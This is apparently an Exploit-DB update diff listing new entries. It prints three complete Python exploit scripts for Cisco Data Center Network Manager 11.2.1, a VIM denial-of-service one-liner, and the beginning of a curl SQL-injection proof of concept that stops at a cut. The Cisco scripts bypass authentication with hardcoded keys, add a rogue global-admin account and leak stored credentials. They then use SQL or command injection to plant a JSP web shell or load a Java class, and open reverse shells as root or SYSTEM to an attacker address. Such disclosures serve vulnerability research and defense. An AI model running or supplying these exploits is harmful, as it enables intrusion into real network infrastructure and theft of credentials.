DB: 2020-02-07

16 changes to exploits/shellcodes

AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)
AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)
VIM 8.2 - Denial of Service (PoC)
AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)

ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
Online Job Portal 1.0 - 'user_email' SQL Injection
Online Job Portal 1.0 - Remote Code Execution
Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
Ecommerce Systempay 1.0 - Production KEY Brute Force
Cisco Data Center Network Manager 11.2 - Remote Code Execution
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection

exploits/java/webapps/48018.py

@@ -0,0 +1,265 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
+- Release: 11.2(1)
+- Release Date: 18-Jun-2019
+- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
+- Size: 1619.36 MB (1698022100 bytes)
+- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
+
+Bug 1: CVE-2019-15975 / ZDI-20-003
+Bug 2: CVE-2019-15979 / ZDI-20-100
+
+Notes:
+======
+
+Si.java needs to be compiled against Java 8 (the target used 1.8u201):
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Si {
+    static{
+        try {
+            String host = "192.168.100.159";
+            int port = 1337;
+            String cmd = "cmd.exe";
+            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+            Socket s = new Socket(host,port);
+            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
+            OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+            while(!s.isClosed()){
+                while(pi.available()>0){
+                    so.write(pi.read());
+                }
+                while(pe.available()>0){
+                    so.write(pe.read());
+                }
+                while(si.available()>0){
+                    po.write(si.read());
+                }
+                so.flush();
+                po.flush();
+                Thread.sleep(50);
+                try {
+                    p.exitValue();
+                    break;
+                }catch (Exception e){}
+            }
+            p.destroy();
+            s.close();
+        }catch (IOException | InterruptedException e){ }
+    }
+}
+
+Example:
+========
+
+1. Modify the above Si.java to contain your connectback ip and port
+2. Compile the above Si.java class with Java 8 and store it in an attacker controlled share
+3. Launch the poc.py against your target using the share
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <connectback:port> <smbserver> <smbpath>
+(+) eg: ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
+
+saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
+(+) attempting auth bypass 1
+(+) bypassed auth! added a global admin hacker:Hacked123
+(+) attempting to load class from \\vmware-host\Shared Folders\tools\Si.class
+(+) starting handler on port 1337
+(+) connection from 192.168.100.122
+(+) pop thy shell!
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
+"""
+
+import re
+import os
+import sys
+import time
+import base64
+import socket
+import requests
+import calendar
+import telnetlib
+from uuid import uuid4
+from threading import Thread
+from Crypto.Cipher import AES
+from xml.etree import ElementTree
+from datetime import datetime, timedelta
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+class AESCipher:
+    def __init__(self):
+
+        # Cisco's hardcoded key
+        self.key = "s91zEQmb305F!90a"
+        self.bs = 16
+
+    def _pad(self, s):
+        return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
+
+    def encrypt(self, raw):
+        raw = self._pad(raw)
+        iv = "\x00" * 0x10
+        cipher = AES.new(self.key, AES.MODE_CBC, iv)
+        return base64.b64encode(cipher.encrypt(raw))
+
+def make_raw_token(target):
+    """ craft our token """
+    key = "Source Incite"
+    uuid = str(uuid4()).replace("-","")[0:20]
+    time = leak_time(target)
+    return "%s-%s-%s" % (key, uuid, time)
+
+def bypass_auth(target, token, usr, pwd):
+    """ we use this primitive to fully bypass auth """
+    global user_added_already
+    d = {
+        "userName" : usr,
+        "password" : pwd,
+        "roleName" : "global-admin"
+    }
+    h = { "afw-token" : token }
+    uri = "https://%s/fm/fmrest/dbadmin/addUser" % target
+    r = requests.post(uri, data=d, headers=h, verify=False)
+    try:
+        json = r.json()
+    except ValueError:
+        return False
+    if json["resultMessage"] == "Success":
+        user_added_already = False
+        return True
+    elif json["resultMessage"] == "User already exists.":
+        user_added_already = True
+        return True
+    return False
+
+def leak_time(target):
+    """ leak the time from the server (not really needed) """
+    uri = "https://%s/" % target
+    r = requests.get(uri, verify=False)
+    r_time = datetime.strptime(r.headers['Date'][:-4], '%a, %d %b %Y %H:%M:%S')
+    return calendar.timegm(r_time.timetuple())
+
+def gen_token(target, usr, pwd):
+    """ this authenticates via the SOAP endpoint """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.jaxws.dcbu.cisco.com/">'
+    soap_body += '\t<soapenv:Header/>'
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:requestToken>'
+    soap_body += '\t\t\t<username>%s</username>' % usr
+    soap_body += '\t\t\t<password>%s</password>' % pwd
+    soap_body += '\t\t\t<expiration>100000</expiration>'
+    soap_body += '\t\t</ep:requestToken>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/LogonWSService/LogonWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    tree = ElementTree.fromstring(r.content)
+    for elem in tree.iter():
+        if elem.tag == "return":
+            return elem.text
+    return False
+
+def craft_soap_header(target, usr, pwd):
+    """ this generates the soap header """
+    soap_header  = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
+    soap_header += '<m:token xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:token>' % gen_token(target, usr, pwd)
+    soap_header += '\t</SOAP-ENV:Header>'
+    return soap_header
+
+def load_remote_class(target, smb, usr, pwd):
+    """ this triggers the cmdi """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header(target, usr, pwd)
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:importTS>'
+    soap_body += '\t\t\t<certFile>" -providerclass Si -providerpath "%s</certFile>' % smb
+    soap_body += '\t\t\t<serverIPAddress></serverIPAddress>'
+    soap_body += '\t\t</ep:importTS>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/SanWSService/SanWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    tree = ElementTree.fromstring(r.content)
+    for elem in tree.iter():
+        if elem.tag == "resultMessage":
+            if elem.text == "Success":
+                return True
+    return False
+
+def handler(lp):
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print  "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, lp, s, usr, pwd):
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    load_remote_class(t, s, usr, pwd)
+
+def main():
+    usr = "hacker"
+    pwd = "Hacked123"
+    if len(sys.argv) != 5:
+        print "(+) usage: %s <target> <connectback:port> <smbserver> <smbpath>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.122 192.168.100.159:1337 vmware-host '\\Shared Folders\\tools'" % sys.argv[0]
+        sys.exit(1)
+    t = sys.argv[1]
+    c = sys.argv[2]
+    s = "\\\\%s%s" % (sys.argv[3], sys.argv[4])
+    i = 0
+
+    if not ":" in c:
+        print "(+) using default connectback port 4444"
+        ls = c
+        lp = 4444
+    else:
+        if not c.split(":")[1].isdigit():
+            print "(-) %s is not a port number!" % cb.split(":")[1]
+            sys.exit(-1)
+        ls = c.split(":")[0]
+        lp = int(c.split(":")[1])
+
+    # InheritableThreadLocal.childValue performs a 'shallow copy' and causes a small race condition
+    while 1:
+        i += 1
+        print "(+) attempting auth bypass %d" % i
+        raw = make_raw_token(t)
+        cryptor = AESCipher()
+        token = cryptor.encrypt(raw)
+        if bypass_auth(t, token, usr, pwd):
+            if not user_added_already:
+                print "(+) bypassed auth! added a global admin %s:%s" % (usr, pwd)
+            else:
+                print "(+) we probably already bypassed auth! try the account %s:%s" % (usr, pwd)
+            break
+        sys.stdout.write('\x1b[1A')
+        sys.stdout.write('\x1b[2K')
+
+    # we have bypassed the authentication at this point
+    print "(+) attempting to load class from %s\\Si.class" % s
+    exec_code(t, lp, s, usr, pwd)
+
+if __name__ == "__main__":
+    main()

exploits/java/webapps/48019.py

@@ -0,0 +1,323 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
+- Release: 11.2(1)
+- Release Date: 18-Jun-2019
+- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
+- Size: 1619.36 MB (1698022100 bytes)
+- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 
+
+Bug 1: CVE-2019-15976 / ZDI-20-008
+Bug 2: CVE-2019-15984 / ZDI-20-060
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <connectback>
+(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
+
+saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
+(+) created the account hacker:Hacked123
+(+) created the 1337/custom path!
+(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c
+(+) SQL Injection working!
+(+) wrote the si.jsp shell!
+(+) cleaned up the database!
+(+) starting handler on port 1337
+(+) connection from 192.168.100.122
+(+) pop thy shell!
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
+
+Clean Up:
+=========
+
+1. delete from xmlDocs where user_name = '1337';
+2. delete si.jsp from the web root
+3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337
+"""
+
+import re
+import md5
+import sys
+import time
+import socket
+import base64
+import requests
+import telnetlib
+from threading import Thread
+from xml.etree import ElementTree
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def _get_jsp(cbh, cbp):
+    """ get me some jsp for a connectback! """
+    jsp = """
+    <%%@page import="java.lang.*"%%>
+    <%%@page import="java.util.*"%%>
+    <%%@page import="java.io.*"%%>
+    <%%@page import="java.net.*"%%>
+
+    <%%
+      // clean up
+      String[] files = {
+          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml", 
+          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/",
+          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/",
+      };
+      for (String s:files){ File f = new File(s); f.delete(); }
+      File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_",".")));
+      f.delete();
+      class StreamConnector extends Thread
+      {
+        InputStream we;
+        OutputStream uo;
+
+        StreamConnector( InputStream we, OutputStream uo )
+        {
+          this.we = we;
+          this.uo = uo;
+        }
+
+        public void run()
+        {
+          BufferedReader dy  = null;
+          BufferedWriter zvi = null;
+          try
+          {
+            dy  = new BufferedReader( new InputStreamReader( this.we ) );
+            zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );
+            char buffer[] = new char[8192];
+            int length;
+            while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )
+            {
+              zvi.write( buffer, 0, length );
+              zvi.flush();
+            }
+          } catch( Exception e ){}
+          try
+          {
+            if( dy != null )
+              dy.close();
+            if( zvi != null )
+              zvi.close();
+          } catch( Exception e ){}
+        }
+      }
+
+      try
+      {
+        String ShellPath;
+        ShellPath = new String("cmd.exe");
+        Socket socket = new Socket( "%s", %s);
+        Process process = Runtime.getRuntime().exec( ShellPath );
+        ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+        ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+      } catch( Exception e ) {}
+    %%>
+    """ % (cbh, cbp)
+    return jsp
+
+def get_session(target, user, password):
+    """ we have bypassed auth at this point and created an admin """
+    d = {
+        "j_username" : user,
+        "j_password" : password
+    }
+    uri = "https://%s/j_spring_security_check" % target
+    r = requests.post(uri, data=d, verify=False, allow_redirects=False)
+    if "Set-Cookie" in r.headers:
+        match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"])
+        if match:
+            sessionid = match.group(1)
+            resttoken = match.group(2)
+            return { "JSESSIONID" : sessionid, "resttoken": resttoken}
+    return False
+
+def craft_soap_header():
+    soap_header  = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
+    soap_header += '<m:ssoToken xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:ssoToken>' % gen_ssotoken()
+    soap_header += '\t</SOAP-ENV:Header>'
+    return soap_header
+
+def we_can_trigger_folder_path_creation(target):
+    """ craft the path location and db entry for the traversal """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:saveReportTemplate>'
+    soap_body += '\t\t\t<reportTemplateName>si</reportTemplateName>'
+    soap_body += '\t\t\t<userName>1337</userName>'
+    soap_body += '\t\t\t<updatedAttrs></updatedAttrs>'
+    soap_body += '\t\t\t<pmInterval>1337</pmInterval>'
+    soap_body += '\t\t</ep:saveReportTemplate>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/ReportWSService/ReportWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def we_can_trigger_second_order_write(target, shellpath):
+    """ trigger the traversal """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:openReportTemplate>'
+    soap_body += '\t\t\t<reportTemplateName>%s</reportTemplateName>' % shellpath
+    soap_body += '\t\t\t<userName>1337</userName>'
+    soap_body += '\t\t</ep:openReportTemplate>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/ReportWSService/ReportWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def gen_ssotoken():
+    """ auth bypass """
+    timestamp = 9999999999999  # we live forever
+    username = "hax"           # doesnt even need to exist!
+    sessionid = 1337           # doesnt even need to exist!
+    d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp)
+    return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)
+
+def we_can_trigger_sql_injection(target, sql):
+    """ stacked sqli primitive """
+    sqli = ";%s--" % sql
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:getVmHostData>'
+    soap_body += '\t\t\t<arg0>'
+    soap_body += '\t\t\t\t<sortField>vcluster</sortField>'
+    soap_body += '\t\t\t\t<sortType>%s</sortType>' % sqli
+    soap_body += '\t\t\t</arg0>'
+    soap_body += '\t\t\t<arg1></arg1>'
+    soap_body += '\t\t\t<arg2></arg2>'
+    soap_body += '\t\t\t<arg3>false</arg3>'
+    soap_body += '\t\t</ep:getVmHostData>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def we_can_leak_vfs(target):
+    """ we use a information disclosure for the vfs path """
+    global vfs
+    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
+    c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')
+    r = requests.get(uri, verify=False, auth=c)
+    match = re.search(r"temp\\(.{21}content-.{15,16})", r.text)
+    if match:
+        vfs = str(match.group(1).replace("\\","/"))
+        return True
+    return False
+
+def handler(lp):
+    """ this is the client handler, to catch the connectback """
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print  "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, usr, pwd, cbp):
+    """ this function threads the client handler and sends off the attacking payload """
+    handlerthr = Thread(target=handler, args=(int(cbp),))
+    handlerthr.start()
+    r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False)
+
+def we_can_add_user(target, usr, pwd):
+    """ add a user so that we can reach our backdoor! """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:addUser>'
+    soap_body += '\t\t\t<userName>%s</userName>' % usr
+    soap_body += '\t\t\t<password>%s</password>' % pwd
+    soap_body += '\t\t\t<roleName>global-admin</roleName>'
+    soap_body += '\t\t\t<enablePwdExpiration>false</enablePwdExpiration>'
+    soap_body += '\t\t</ep:addUser>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/DbAdminWSService/DbAdminWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    tree = ElementTree.fromstring(r.content)
+    for elem in tree.iter():
+        if elem.tag == "resultMessage":
+            res = elem.text
+    if res == "Success":
+        return True
+    elif res == "User already exists.":
+        return True
+    return False
+
+def main():
+
+    usr = "hacker"
+    pwd = "Hacked123"
+
+    if len(sys.argv) != 3:
+        print "(+) usage: %s <target> <connectback>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.122 192.168.100.59:1337" % sys.argv[0]
+        sys.exit(1)
+
+    t = sys.argv[1]
+    c = sys.argv[2]
+
+    cbh = c.split(":")[0]
+    cbp = c.split(":")[1]
+    sc = _get_jsp(cbh, cbp).encode("hex")
+
+    # stage 1 - add a user
+    if we_can_add_user(t, usr, pwd):
+        print "(+) created the account %s:%s" % (usr, pwd)
+
+        # stage 2 - trigger folder creation and db entry
+        if we_can_trigger_folder_path_creation(t):
+            print "(+) created the 1337/custom path!"
+
+            # stage 3 - leak the vfs path (not really required I suppose)
+            if we_can_leak_vfs(t):
+                print "(+) leaked vfs! %s" % vfs
+
+                # stage 4 - trigger the sql injection to update our template entry
+                sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs
+                sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc)
+                if we_can_trigger_sql_injection(t, sql):
+                    print "(+) SQL Injection working!"
+
+                    # stage 5 - trigger the shell write
+                    if we_can_trigger_second_order_write(t, sp):
+                        print "(+) wrote the si.jsp shell!"
+
+                        # stage 6 - cleanup
+                        sql = "delete from xmldocs where user_name='1337';"
+                        if we_can_trigger_sql_injection(t, sql):
+                            print "(+) cleaned up the database!"
+
+                        # stage 7 - go get some rce
+                        exec_code(t, usr, pwd, cbp)
+
+if __name__ == "__main__":
+    main()

exploits/java/webapps/48020.py

@@ -0,0 +1,201 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
+- Release: 11.2(1)
+- Release Date: 05-Jun-2019
+- FileName: dcnm-va.11.2.1.iso.zip
+- Size: 4473.54 MB (4690850167 bytes)
+- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb 
+
+Bug 1: CVE-2019-15977 / ZDI-20-012
+Bug 2: CVE-2019-15977 / ZDI-20-013
+Bug 3: CVE-2019-15978 / ZDI-20-102
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <connectback:port>
+(+) eg: ./poc.py 192.168.100.123 192.168.100.59
+(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337
+
+saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337
+(+) leaked user: root
+(+) leaked pass: Dcnmpass123
+(+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012
+(+) created a root session!
+(+) starting handler on port 1337
+(+) connection from 192.168.100.123
+(+) pop thy shell!
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+"""
+
+import re
+import sys
+import random
+import socket
+import string
+import requests
+import telnetlib
+from threading import Thread
+from Crypto.Cipher import Blowfish
+from requests.auth import HTTPBasicAuth
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def handler(lp):
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print  "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, lp, s):
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    c = { "JSESSIONID" : sessionid }
+    r = requests.get("https://%s/%s" % (t, s), cookies=c, verify=False)
+
+def random_string(string_length = 8):
+    """ generate a random string of fixed length """
+    letters = string.ascii_lowercase
+    return ''.join(random.choice(letters) for i in range(string_length))
+
+def decrypt(key):
+    """ decrypt the leaked password """
+    cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB)
+    msg = cipher.decrypt(key.decode("hex"))
+    return msg
+
+def we_can_leak(target):
+    """ used to bypass auth """
+    global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass
+    dbuser = None
+    dbpass = None 
+    vfspth = None
+    rootuser = None
+    rootpass = None
+    jdbc = None
+    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
+    c = HTTPBasicAuth('admin', 'nbv_12345')
+    r = requests.get(uri, verify=False, auth=c)
+    leaked = r.text
+    match = re.search("db.password = #(.*)", leaked)
+    if match:
+        dbpass = match.group(1)
+    match = re.search("db.user = (.*)", leaked)
+    if match:
+        dbuser = match.group(1)
+    match = re.search("dcnmweb = (.*)", leaked)
+    if match:
+        vfspth = match.group(1)
+    match = re.search("db.url = (.*)", leaked)
+    if match:
+        jdbc = match.group(1)
+    match = re.search("server.sftp.password = #(.*)", leaked)
+    if match:
+        rootpass = match.group(1)
+    match = re.search("server.sftp.username = (.*)", leaked)
+    if match:
+        rootuser = match.group(1)
+    if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass:
+        return True
+    return False
+
+def we_can_login(target, password):
+    """ we have bypassed auth at this point by leaking the creds """
+    global sessionid, resttoken
+    d = {
+        "j_username" : rootuser,
+        "j_password" : password,
+    }
+    uri = "https://%s/j_spring_security_check" % target
+    r = requests.post(uri, data=d, verify=False, allow_redirects=False)
+    if "Set-Cookie" in r.headers:
+        match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"])
+        if match:
+            sessionid = match.group(1)
+            resttoken = match.group(2)
+            return True
+    return False
+
+def pop_a_root_shell(t, ls, lp):
+    """ get dat shell! """
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    uri = "https://%s/rest/fabrics" % t
+    cmdi  = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp)
+    cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\""
+    j = { 
+        "name" : cmdi,
+
+        # this is needed to pass validate() on line 149 of the LanFabricImpl class
+        "generalSetting" : {
+            "asn" : "1337",
+            "provisionOption" : "Manual"
+        }, 
+        "provisionSetting" : {
+            "dhcpSetting": {
+                "primarySubnet" : "127.0.0.1",
+                "primaryDNS" : "127.0.0.1",
+                "secondaryDNS" : "127.0.0.1"
+            },
+            "ldapSetting" : {
+                "server" : "127.0.0.1"
+            },
+            "amqpSetting" : {
+                "server" : "127.0.0.1:1337"
+            }
+        }
+    }
+    c = { "resttoken": resttoken }
+    r = requests.post(uri, json=j, cookies=c, verify=False)
+    if r.status_code == 200 and ls in r.text:
+        return True
+    return False
+
+def main():
+    if len(sys.argv) != 3:
+        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0]
+        sys.exit(1)
+    t = sys.argv[1]
+    cb = sys.argv[2]
+    if not ":" in cb:
+        print "(+) using default connectback port 4444"
+        ls = cb
+        lp = 4444
+    else:
+        if not cb.split(":")[1].isdigit():
+            print "(-) %s is not a port number!" % cb.split(":")[1]
+            sys.exit(-1)
+        ls = cb.split(":")[0]
+        lp = int(cb.split(":")[1])
+
+    # stage 1 - leak the creds
+    if we_can_leak(t):
+        pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass))
+        print "(+) leaked user: %s" % rootuser
+        print "(+) leaked pass: %s" % pwd
+        print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:])
+
+        # stage 2 - get a valid sesson
+        if we_can_login(t, pwd):
+            print "(+) created a root session!"
+
+            # stage 3 - get a root shell via cmdi
+            pop_a_root_shell(t, ls, lp)
+
+if __name__ == "__main__":
+    main()

exploits/linux/dos/48008.txt

@@ -0,0 +1,11 @@
+# Exploit Title: VIM 8.2 - Denial of Service (PoC)
+# Date: 2019-12-17
+# Vulnerability: DoS
+# Vulnerability Discovery: Dhiraj Mishra
+# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131)
+# Vendor Homepage: https://www.vim.org/
+# References:
+# https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49
+#  Invalid memory access with search command
+
+PoC: vim --clean -e -s -c 'exe "norm /\x80PS"'

exploits/php/webapps/48007.txt

@@ -0,0 +1,56 @@
+# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# 
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 282' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
